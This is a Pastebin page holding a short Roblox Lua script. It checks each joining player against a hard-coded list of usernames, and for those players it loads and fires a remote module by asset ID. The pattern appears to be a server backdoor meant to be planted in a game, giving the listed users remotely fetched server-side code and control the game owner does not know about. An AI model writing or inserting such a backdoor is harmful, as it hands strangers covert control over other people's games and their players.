Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local allowed = {"personsadminlol", "Carlo_506", "XxraminHackXx", "mrfilmflam"}
- game.Players.PlayerAdded:Connect(function(player)
- for i, v in pairs(allowed) do
- if player.Name == v then
- require(3397500272):Fire(player.Name)
- end
- end
- end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement